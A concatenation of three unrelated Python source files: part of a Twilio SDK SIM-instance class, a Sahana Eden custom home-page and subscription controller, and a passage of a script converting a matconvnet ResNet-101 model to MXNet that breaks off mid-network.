return self._properties['sms_method']
@property
def sms_url(self):
"""
:returns: The sms_url
:rtype: unicode
"""
return self._properties['sms_url']
@property
def voice_fallback_method(self):
"""
:returns: The voice_fallback_method
:rtype: unicode
"""
return self._properties['voice_fallback_method']
@property
def voice_fallback_url(self):
"""
:returns: The voice_fallback_url
:rtype: unicode
"""
return self._properties['voice_fallback_url']
@property
def voice_method(self):
"""
:returns: The voice_method
:rtype: unicode
"""
return self._properties['voice_method']
@property
def voice_url(self):
"""
:returns: The voice_url
:rtype: unicode
"""
return self._properties['voice_url']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def url(self):
"""
:returns: The url
:rtype: unicode
"""
return self._properties['url']
@property
def links(self):
"""
:returns: The links
:rtype: unicode
"""
return self._properties['links']
def fetch(self):
"""
Fetch a SimInstance
:returns: Fetched SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
return self._proxy.fetch()
def update(self, unique_name=values.unset, callback_method=values.unset,
callback_url=values.unset, friendly_name=values.unset,
rate_plan=values.unset, status=values.unset,
commands_callback_method=values.unset,
commands_callback_url=values.unset, sms_fallback_method=values.unset,
sms_fallback_url=values.unset, sms_method=values.unset,
sms_url=values.unset, voice_fallback_method=values.unset,
voice_fallback_url=values.unset, voice_method=values.unset,
voice_url=values.unset):
"""
Update the SimInstance
:param unicode unique_name: The unique_name
:param unicode callback_method: The callback_method
:param unicode callback_url: The callback_url
:param unicode friendly_name: The friendly_name
:param unicode rate_plan: The rate_plan
:param unicode status: The status
:param unicode commands_callback_method: The commands_callback_method
:param unicode commands_callback_url: The commands_callback_url
:param unicode sms_fallback_method: The sms_fallback_method
:param unicode sms_fallback_url: The sms_fallback_url
:param unicode sms_method: The sms_method
:param unicode sms_url: The sms_url
:param unicode voice_fallback_method: The voice_fallback_method
:param unicode voice_fallback_url: The voice_fallback_url
:param unicode voice_method: The voice_method
:param unicode voice_url: The voice_url
:returns: Updated SimInstance
:rtype: twilio.rest.preview.wireless.sim.SimInstance
"""
return self._proxy.update(
unique_name=unique_name,
callback_method=callback_method,
callback_url=callback_url,
friendly_name=friendly_name,
rate_plan=rate_plan,
status=status,
commands_callback_method=commands_callback_method,
commands_callback_url=commands_callback_url,
sms_fallback_method=sms_fallback_method,
sms_fallback_url=sms_fallback_url,
sms_method=sms_method,
sms_url=sms_url,
voice_fallback_method=voice_fallback_method,
voice_fallback_url=voice_fallback_url,
voice_method=voice_method,
voice_url=voice_url,
)
@property
def usage(self):
"""
Access the usage
:returns: twilio.rest.preview.wireless.sim.usage.UsageList
:rtype: twilio.rest.preview.wireless.sim.usage.UsageList
"""
return self._proxy.usage
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.SimInstance {}>'.format(context)
|
|
# -*- coding: utf-8 -*-
import json
from os import path
from gluon import current, URL
from gluon.html import *
from gluon.storage import Storage
from gluon.sqlhtml import SQLFORM
from s3 import S3FilterForm, S3CustomController, S3OptionsFilter, S3Request, \
S3SQLCustomForm
THEME = "historic.SSF"
# =============================================================================
class index(S3CustomController):
""" Custom Home Page """
def __call__(self):
response = current.response
settings = current.deployment_settings
request = current.request
s3 = response.s3
db = current.db
s3db = current.s3db
T = current.T
output = {}
output["title"] = response.title = current.deployment_settings.get_system_name()
view = path.join(current.request.folder, "modules", "templates",
THEME, "views", "index.html")
try:
# Pass view as file not str to work in compiled mode
response.view = open(view, "rb")
except IOError:
from gluon.http import HTTP
raise HTTP(404, "Unable to open Custom View: %s" % view)
project_url = URL(c="project", f="location", extension="geojson")
project_url = "%s?~.project_id$sector.name=Deployment" % project_url
contributor_url = URL(c="pr", f="person", extension="geojson")
# Set the marker
mtable = s3db.gis_marker
query = (mtable.name == "sunflower") | (mtable.name == "contributor")
markers = db(query).select(mtable.name,
mtable.image,
mtable.height,
mtable.width,
cache=s3db.cache,
limitby=(0, 2)
)
project_marker = None
contributor_marker = None
for marker in markers:
if marker.name == "sunflower":
project_marker = marker
if marker.name == "contributor":
contributor_marker = marker
layers = [{"name" : T("Deployments"),
"id" : "deployments",
"tablename" : "project_location",
"url" : project_url,
"active" : True,
"marker" : project_marker,
},
{"name" : T("Contributors"),
"id" : "contributors",
"tablename" : "pr_address",
"url" : contributor_url,
"active" : True,
"marker" : contributor_marker,
},
]
output["map"] = current.gis.show_map(collapsed = True,
feature_resources = layers,
legend="float",
)
s3.scripts.append("http://www.google.com/jsapi?key=notsupplied-wizard")
feed_control = "".join(('''
function LoadFeeds(){
var feeds=[
{title:'Tasks',
url:\'''', settings.get_base_public_url(), '''/''', request.application, '''/project/task.rss?task.status=2,3,4,11'
},
{title:'Tickets',
url:'http://eden.sahanafoundation.org/timeline?ticket=on&changeset=on&milestone=on&max=50&daysback=90&format=rss'
},
{title:'Wiki',
url:'http://eden.sahanafoundation.org/timeline?changeset=on&milestone=on&wiki=on&max=50&daysback=90&format=rss'
},
{title:'Github',
url:'https://github.com/flavour/eden/commits/master.atom'
},
{title:'Twitter',
url:'http://www.rssitfor.me/getrss?name=@SahanaFOSS'
},
{title:'Blog',
url:'http://sahanafoundation.org/feed/?cat=33,39'
}
];
var feedControl = new google.feeds.FeedControl();
// Add feeds.
for(i=0; i<feeds.length; i++){
feedControl.addFeed(feeds[i].url, feeds[i].title);
}
feedControl.setNumEntries(5);
feedControl.draw(document.getElementById("feed-control"),
{
drawMethod: 'content',
drawMode : google.feeds.FeedControl.DRAW_MODE_TABBED
});
// Initialise feed-url input
$('#feed-url').attr('href', feeds[0].url);
$('#feed-url').attr('title', feeds[0].title);
// Show feed-url
$('.gfc-tabHeader').click(feeds, function(){
activeTab = $('.gfc-tabhActive').html();
for(i=0; i<feeds.length; i++){
if(feeds[i].title == activeTab){
$('#feed-url').attr('href', feeds[i].url);
$('#feed-url').attr('title', feeds[i].title);
break;
}
}
});
}
google.load('feeds','1')
google.setOnLoadCallback(LoadFeeds)'''))
s3.js_global.append(feed_control)
return output
# =============================================================================
class subscriptions(S3CustomController):
"""
Custom page to configure Subscription settings
"""
def __call__(self):
"""
Main entry point, configuration
"""
T = current.T
auth = current.auth
# Must be logged in
if not auth.s3_logged_in():
auth.permission.fail()
form = self.create_form()
if form:
output = {"title": T("Subscription Settings"),
"form": form}
else:
output = {"title": T("No Subscriptions")}
# View
self._view(THEME, "subscriptions.html")
return output
def create_form(self):
"""
Build form for subscription settings
"""
T = current.T
db = current.db
response = current.response
user = current.auth.user.pe_id
stable = current.s3db.pr_subscription
formstyle = current.deployment_settings.get_ui_formstyle()
query = (stable.pe_id == user) & \
(stable.deleted != True)
row = db(query).select(stable.id,
stable.frequency,
stable.email_format,
limitby=(0, 1))
messages = Storage(
ERROR = T("Error: could not update subscription settings"),
SUCCESS = T("Settings updated"),
)
if row:
# Subscription exists, build form
freq_field = stable.frequency
format_field = stable.email_format
freq_field.default = row[0].frequency
format_field.default = row[0].email_format
form = SQLFORM.factory(freq_field,
format_field,
formstyle = formstyle)
if form.accepts(current.request.post_vars,
current.session,
keepvalues=True):
formvars = form.vars
from templates.SSF.config import TaskSubscriptions
sub = TaskSubscriptions()
sub.subscription["frequency"] = formvars.frequency
sub.subscription["email_format"] = formvars.email_format
if sub.update_subscription():
response.confirmation = messages.SUCCESS
else:
response.error = messages.ERROR
return form
else:
return None
# =============================================================================
|
|
# coding: utf-8
# In[62]:
import mxnet as mx
import numpy as np
import scipy.io as sio
# In[63]:
symbol_string = "import mxnet as mx\ndata= mx.symbol.Variable(name='data')\n"
# In[64]:
matpath='./hr_res101.mat'
# In[65]:
f = sio.loadmat(matpath)
net = f['net']
# In[66]:
data = mx.symbol.Variable(name='data')
conv1 = mx.symbol.Convolution(name='conv1', data=data , num_filter=64, pad=(3, 3), kernel=(7,7), stride=(2,2), no_bias=True)
# Turn cuDNN off in all batchnorm layers, as cuDNN does not support eps <= 0.00001
bn_conv1 = mx.symbol.BatchNorm(name='bn_conv1', data=conv1 , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
conv1_relu = mx.symbol.Activation(name='conv1_relu', data=bn_conv1 , act_type='relu')
# Pad right and bottom to match the original matconvnet implementation
conv1_relu_padded = mx.symbol.pad(name='conv1_relu_padded', data=conv1_relu, mode='constant', constant_value=0, pad_width=(0,0,0,0,0,1,0,1))
# Pooling in matconvnet uses 'valid' mode, not 'full'
pool1 = mx.symbol.Pooling(name='pool1', data=conv1_relu_padded , pooling_convention='valid', pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
# An alternative way to handle matconvnet's right and bottom padding:
# pool1 = mx.symbol.Pooling(name='pool1', data=conv1_relu , pooling_convention='full', pad=(0,0), kernel=(3,3), stride=(2,2), pool_type='max')
res2a_branch1 = mx.symbol.Convolution(name='res2a_branch1', data=pool1 , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2a_branch1 = mx.symbol.BatchNorm(name='bn2a_branch1', data=res2a_branch1 , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2a_branch2a = mx.symbol.Convolution(name='res2a_branch2a', data=pool1 , num_filter=64, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2a_branch2a = mx.symbol.BatchNorm(name='bn2a_branch2a', data=res2a_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2a_branch2a_relu = mx.symbol.Activation(name='res2a_branch2a_relu', data=bn2a_branch2a , act_type='relu')
res2a_branch2b = mx.symbol.Convolution(name='res2a_branch2b', data=res2a_branch2a_relu , num_filter=64, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn2a_branch2b = mx.symbol.BatchNorm(name='bn2a_branch2b', data=res2a_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2a_branch2b_relu = mx.symbol.Activation(name='res2a_branch2b_relu', data=bn2a_branch2b , act_type='relu')
res2a_branch2c = mx.symbol.Convolution(name='res2a_branch2c', data=res2a_branch2b_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2a_branch2c = mx.symbol.BatchNorm(name='bn2a_branch2c', data=res2a_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2a = mx.symbol.broadcast_add(name='res2a', *[bn2a_branch1,bn2a_branch2c] )
res2a_relu = mx.symbol.Activation(name='res2a_relu', data=res2a , act_type='relu')
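# Every residual unit below repeats the same bottleneck pattern
# (1x1 conv -> BN -> ReLU -> 3x3 conv -> BN -> ReLU -> 1x1 conv -> BN,
# added to a shortcut and passed through ReLU). A minimal helper sketch of
# that pattern follows, for reference only: this conversion script keeps
# every layer written out explicitly so the symbol names line up with the
# matconvnet weight names in the .mat file.
def _bottleneck_sketch(data, prefix, num_filter, out_filter,
                       stride=(1, 1), shortcut=None):
    """Build one ResNet bottleneck unit; shortcut defaults to identity."""
    def _bn(name, sym):
        # Same BatchNorm settings as used throughout this script
        return mx.symbol.BatchNorm(name=name, data=sym, use_global_stats=True,
                                   fix_gamma=False, eps=0.00001,
                                   cudnn_off=True)
    b2a = mx.symbol.Convolution(name='res%s_branch2a' % prefix, data=data,
                                num_filter=num_filter, pad=(0, 0),
                                kernel=(1, 1), stride=stride, no_bias=True)
    b2a = mx.symbol.Activation(name='res%s_branch2a_relu' % prefix,
                               data=_bn('bn%s_branch2a' % prefix, b2a),
                               act_type='relu')
    b2b = mx.symbol.Convolution(name='res%s_branch2b' % prefix, data=b2a,
                                num_filter=num_filter, pad=(1, 1),
                                kernel=(3, 3), stride=(1, 1), no_bias=True)
    b2b = mx.symbol.Activation(name='res%s_branch2b_relu' % prefix,
                               data=_bn('bn%s_branch2b' % prefix, b2b),
                               act_type='relu')
    b2c = _bn('bn%s_branch2c' % prefix,
              mx.symbol.Convolution(name='res%s_branch2c' % prefix, data=b2b,
                                    num_filter=out_filter, pad=(0, 0),
                                    kernel=(1, 1), stride=(1, 1),
                                    no_bias=True))
    if shortcut is None:
        shortcut = data  # identity shortcut
    total = mx.symbol.broadcast_add(name='res%s' % prefix,
                                    *[shortcut, b2c])
    return mx.symbol.Activation(name='res%s_relu' % prefix, data=total,
                                act_type='relu')
# For example, res2b below is equivalent to
# _bottleneck_sketch(res2a_relu, '2b', 64, 256).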
res2b_branch2a = mx.symbol.Convolution(name='res2b_branch2a', data=res2a_relu , num_filter=64, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2b_branch2a = mx.symbol.BatchNorm(name='bn2b_branch2a', data=res2b_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2b_branch2a_relu = mx.symbol.Activation(name='res2b_branch2a_relu', data=bn2b_branch2a , act_type='relu')
res2b_branch2b = mx.symbol.Convolution(name='res2b_branch2b', data=res2b_branch2a_relu , num_filter=64, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn2b_branch2b = mx.symbol.BatchNorm(name='bn2b_branch2b', data=res2b_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2b_branch2b_relu = mx.symbol.Activation(name='res2b_branch2b_relu', data=bn2b_branch2b , act_type='relu')
res2b_branch2c = mx.symbol.Convolution(name='res2b_branch2c', data=res2b_branch2b_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2b_branch2c = mx.symbol.BatchNorm(name='bn2b_branch2c', data=res2b_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2b = mx.symbol.broadcast_add(name='res2b', *[res2a_relu,bn2b_branch2c] )
res2b_relu = mx.symbol.Activation(name='res2b_relu', data=res2b , act_type='relu')
res2c_branch2a = mx.symbol.Convolution(name='res2c_branch2a', data=res2b_relu , num_filter=64, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2c_branch2a = mx.symbol.BatchNorm(name='bn2c_branch2a', data=res2c_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2c_branch2a_relu = mx.symbol.Activation(name='res2c_branch2a_relu', data=bn2c_branch2a , act_type='relu')
res2c_branch2b = mx.symbol.Convolution(name='res2c_branch2b', data=res2c_branch2a_relu , num_filter=64, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn2c_branch2b = mx.symbol.BatchNorm(name='bn2c_branch2b', data=res2c_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2c_branch2b_relu = mx.symbol.Activation(name='res2c_branch2b_relu', data=bn2c_branch2b , act_type='relu')
res2c_branch2c = mx.symbol.Convolution(name='res2c_branch2c', data=res2c_branch2b_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn2c_branch2c = mx.symbol.BatchNorm(name='bn2c_branch2c', data=res2c_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res2c = mx.symbol.broadcast_add(name='res2c', *[res2b_relu,bn2c_branch2c] )
res2c_relu = mx.symbol.Activation(name='res2c_relu', data=res2c , act_type='relu')
res3a_branch1 = mx.symbol.Convolution(name='res3a_branch1', data=res2c_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(2,2), no_bias=True)
bn3a_branch1 = mx.symbol.BatchNorm(name='bn3a_branch1', data=res3a_branch1 , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3a_branch2a = mx.symbol.Convolution(name='res3a_branch2a', data=res2c_relu , num_filter=128, pad=(0, 0), kernel=(1,1), stride=(2,2), no_bias=True)
bn3a_branch2a = mx.symbol.BatchNorm(name='bn3a_branch2a', data=res3a_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3a_branch2a_relu = mx.symbol.Activation(name='res3a_branch2a_relu', data=bn3a_branch2a , act_type='relu')
res3a_branch2b = mx.symbol.Convolution(name='res3a_branch2b', data=res3a_branch2a_relu , num_filter=128, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn3a_branch2b = mx.symbol.BatchNorm(name='bn3a_branch2b', data=res3a_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3a_branch2b_relu = mx.symbol.Activation(name='res3a_branch2b_relu', data=bn3a_branch2b , act_type='relu')
res3a_branch2c = mx.symbol.Convolution(name='res3a_branch2c', data=res3a_branch2b_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3a_branch2c = mx.symbol.BatchNorm(name='bn3a_branch2c', data=res3a_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3a = mx.symbol.broadcast_add(name='res3a', *[bn3a_branch1,bn3a_branch2c] )
res3a_relu = mx.symbol.Activation(name='res3a_relu', data=res3a , act_type='relu')
res3b1_branch2a = mx.symbol.Convolution(name='res3b1_branch2a', data=res3a_relu , num_filter=128, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b1_branch2a = mx.symbol.BatchNorm(name='bn3b1_branch2a', data=res3b1_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b1_branch2a_relu = mx.symbol.Activation(name='res3b1_branch2a_relu', data=bn3b1_branch2a , act_type='relu')
res3b1_branch2b = mx.symbol.Convolution(name='res3b1_branch2b', data=res3b1_branch2a_relu , num_filter=128, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn3b1_branch2b = mx.symbol.BatchNorm(name='bn3b1_branch2b', data=res3b1_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b1_branch2b_relu = mx.symbol.Activation(name='res3b1_branch2b_relu', data=bn3b1_branch2b , act_type='relu')
res3b1_branch2c = mx.symbol.Convolution(name='res3b1_branch2c', data=res3b1_branch2b_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b1_branch2c = mx.symbol.BatchNorm(name='bn3b1_branch2c', data=res3b1_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b1 = mx.symbol.broadcast_add(name='res3b1', *[res3a_relu,bn3b1_branch2c] )
res3b1_relu = mx.symbol.Activation(name='res3b1_relu', data=res3b1 , act_type='relu')
res3b2_branch2a = mx.symbol.Convolution(name='res3b2_branch2a', data=res3b1_relu , num_filter=128, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b2_branch2a = mx.symbol.BatchNorm(name='bn3b2_branch2a', data=res3b2_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b2_branch2a_relu = mx.symbol.Activation(name='res3b2_branch2a_relu', data=bn3b2_branch2a , act_type='relu')
res3b2_branch2b = mx.symbol.Convolution(name='res3b2_branch2b', data=res3b2_branch2a_relu , num_filter=128, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn3b2_branch2b = mx.symbol.BatchNorm(name='bn3b2_branch2b', data=res3b2_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b2_branch2b_relu = mx.symbol.Activation(name='res3b2_branch2b_relu', data=bn3b2_branch2b , act_type='relu')
res3b2_branch2c = mx.symbol.Convolution(name='res3b2_branch2c', data=res3b2_branch2b_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b2_branch2c = mx.symbol.BatchNorm(name='bn3b2_branch2c', data=res3b2_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b2 = mx.symbol.broadcast_add(name='res3b2', *[res3b1_relu,bn3b2_branch2c] )
res3b2_relu = mx.symbol.Activation(name='res3b2_relu', data=res3b2 , act_type='relu')
res3b3_branch2a = mx.symbol.Convolution(name='res3b3_branch2a', data=res3b2_relu , num_filter=128, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b3_branch2a = mx.symbol.BatchNorm(name='bn3b3_branch2a', data=res3b3_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b3_branch2a_relu = mx.symbol.Activation(name='res3b3_branch2a_relu', data=bn3b3_branch2a , act_type='relu')
res3b3_branch2b = mx.symbol.Convolution(name='res3b3_branch2b', data=res3b3_branch2a_relu , num_filter=128, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn3b3_branch2b = mx.symbol.BatchNorm(name='bn3b3_branch2b', data=res3b3_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b3_branch2b_relu = mx.symbol.Activation(name='res3b3_branch2b_relu', data=bn3b3_branch2b , act_type='relu')
res3b3_branch2c = mx.symbol.Convolution(name='res3b3_branch2c', data=res3b3_branch2b_relu , num_filter=512, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn3b3_branch2c = mx.symbol.BatchNorm(name='bn3b3_branch2c', data=res3b3_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res3b3 = mx.symbol.broadcast_add(name='res3b3', *[res3b2_relu,bn3b3_branch2c] )
res3b3_relu = mx.symbol.Activation(name='res3b3_relu', data=res3b3 , act_type='relu')
res4a_branch1 = mx.symbol.Convolution(name='res4a_branch1', data=res3b3_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(2,2), no_bias=True)
bn4a_branch1 = mx.symbol.BatchNorm(name='bn4a_branch1', data=res4a_branch1 , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4a_branch2a = mx.symbol.Convolution(name='res4a_branch2a', data=res3b3_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(2,2), no_bias=True)
bn4a_branch2a = mx.symbol.BatchNorm(name='bn4a_branch2a', data=res4a_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4a_branch2a_relu = mx.symbol.Activation(name='res4a_branch2a_relu', data=bn4a_branch2a , act_type='relu')
res4a_branch2b = mx.symbol.Convolution(name='res4a_branch2b', data=res4a_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4a_branch2b = mx.symbol.BatchNorm(name='bn4a_branch2b', data=res4a_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4a_branch2b_relu = mx.symbol.Activation(name='res4a_branch2b_relu', data=bn4a_branch2b , act_type='relu')
res4a_branch2c = mx.symbol.Convolution(name='res4a_branch2c', data=res4a_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4a_branch2c = mx.symbol.BatchNorm(name='bn4a_branch2c', data=res4a_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4a = mx.symbol.broadcast_add(name='res4a', *[bn4a_branch1,bn4a_branch2c] )
res4a_relu = mx.symbol.Activation(name='res4a_relu', data=res4a , act_type='relu')
res4b1_branch2a = mx.symbol.Convolution(name='res4b1_branch2a', data=res4a_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b1_branch2a = mx.symbol.BatchNorm(name='bn4b1_branch2a', data=res4b1_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b1_branch2a_relu = mx.symbol.Activation(name='res4b1_branch2a_relu', data=bn4b1_branch2a , act_type='relu')
res4b1_branch2b = mx.symbol.Convolution(name='res4b1_branch2b', data=res4b1_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b1_branch2b = mx.symbol.BatchNorm(name='bn4b1_branch2b', data=res4b1_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b1_branch2b_relu = mx.symbol.Activation(name='res4b1_branch2b_relu', data=bn4b1_branch2b , act_type='relu')
res4b1_branch2c = mx.symbol.Convolution(name='res4b1_branch2c', data=res4b1_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b1_branch2c = mx.symbol.BatchNorm(name='bn4b1_branch2c', data=res4b1_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b1 = mx.symbol.broadcast_add(name='res4b1', *[res4a_relu,bn4b1_branch2c] )
res4b1_relu = mx.symbol.Activation(name='res4b1_relu', data=res4b1 , act_type='relu')
res4b2_branch2a = mx.symbol.Convolution(name='res4b2_branch2a', data=res4b1_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b2_branch2a = mx.symbol.BatchNorm(name='bn4b2_branch2a', data=res4b2_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b2_branch2a_relu = mx.symbol.Activation(name='res4b2_branch2a_relu', data=bn4b2_branch2a , act_type='relu')
res4b2_branch2b = mx.symbol.Convolution(name='res4b2_branch2b', data=res4b2_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b2_branch2b = mx.symbol.BatchNorm(name='bn4b2_branch2b', data=res4b2_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b2_branch2b_relu = mx.symbol.Activation(name='res4b2_branch2b_relu', data=bn4b2_branch2b , act_type='relu')
res4b2_branch2c = mx.symbol.Convolution(name='res4b2_branch2c', data=res4b2_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b2_branch2c = mx.symbol.BatchNorm(name='bn4b2_branch2c', data=res4b2_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b2 = mx.symbol.broadcast_add(name='res4b2', *[res4b1_relu,bn4b2_branch2c] )
res4b2_relu = mx.symbol.Activation(name='res4b2_relu', data=res4b2 , act_type='relu')
res4b3_branch2a = mx.symbol.Convolution(name='res4b3_branch2a', data=res4b2_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b3_branch2a = mx.symbol.BatchNorm(name='bn4b3_branch2a', data=res4b3_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b3_branch2a_relu = mx.symbol.Activation(name='res4b3_branch2a_relu', data=bn4b3_branch2a , act_type='relu')
res4b3_branch2b = mx.symbol.Convolution(name='res4b3_branch2b', data=res4b3_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b3_branch2b = mx.symbol.BatchNorm(name='bn4b3_branch2b', data=res4b3_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b3_branch2b_relu = mx.symbol.Activation(name='res4b3_branch2b_relu', data=bn4b3_branch2b , act_type='relu')
res4b3_branch2c = mx.symbol.Convolution(name='res4b3_branch2c', data=res4b3_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b3_branch2c = mx.symbol.BatchNorm(name='bn4b3_branch2c', data=res4b3_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b3 = mx.symbol.broadcast_add(name='res4b3', *[res4b2_relu,bn4b3_branch2c] )
res4b3_relu = mx.symbol.Activation(name='res4b3_relu', data=res4b3 , act_type='relu')
res4b4_branch2a = mx.symbol.Convolution(name='res4b4_branch2a', data=res4b3_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b4_branch2a = mx.symbol.BatchNorm(name='bn4b4_branch2a', data=res4b4_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b4_branch2a_relu = mx.symbol.Activation(name='res4b4_branch2a_relu', data=bn4b4_branch2a , act_type='relu')
res4b4_branch2b = mx.symbol.Convolution(name='res4b4_branch2b', data=res4b4_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
bn4b4_branch2b = mx.symbol.BatchNorm(name='bn4b4_branch2b', data=res4b4_branch2b , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b4_branch2b_relu = mx.symbol.Activation(name='res4b4_branch2b_relu', data=bn4b4_branch2b , act_type='relu')
res4b4_branch2c = mx.symbol.Convolution(name='res4b4_branch2c', data=res4b4_branch2b_relu , num_filter=1024, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b4_branch2c = mx.symbol.BatchNorm(name='bn4b4_branch2c', data=res4b4_branch2c , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b4 = mx.symbol.broadcast_add(name='res4b4', *[res4b3_relu,bn4b4_branch2c] )
res4b4_relu = mx.symbol.Activation(name='res4b4_relu', data=res4b4 , act_type='relu')
res4b5_branch2a = mx.symbol.Convolution(name='res4b5_branch2a', data=res4b4_relu , num_filter=256, pad=(0, 0), kernel=(1,1), stride=(1,1), no_bias=True)
bn4b5_branch2a = mx.symbol.BatchNorm(name='bn4b5_branch2a', data=res4b5_branch2a , use_global_stats=True, fix_gamma=False, eps=0.00001, cudnn_off=True)
res4b5_branch2a_relu = mx.symbol.Activation(name='res4b5_branch2a_relu', data=bn4b5_branch2a , act_type='relu')
res4b5_branch2b = mx.symbol.Convolution(name='res4b5_branch2b', data=res4b5_branch2a_relu , num_filter=256, pad=(1, 1), kernel=(3,3), stride=(1,1), no_bias=True)
